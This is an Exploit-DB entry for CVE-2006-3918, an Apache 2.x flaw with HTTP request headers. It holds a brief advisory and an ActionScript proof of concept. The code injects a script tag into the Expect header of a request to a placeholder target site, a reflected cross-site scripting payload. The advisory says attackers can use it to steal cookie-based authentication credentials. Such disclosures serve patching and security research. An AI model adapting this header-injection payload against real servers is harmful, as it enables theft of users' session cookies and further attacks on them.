Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness

2006-08-24T00:00:00
ID EDB-ID:28424
Type exploitdb
Reporter Thiago Zaninotti
Modified 2006-08-24T00:00:00

Description

Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness. CVE-2006-3918. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/19661/info

Apache HTTP server is prone to a security weakness related to HTTP request headers.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");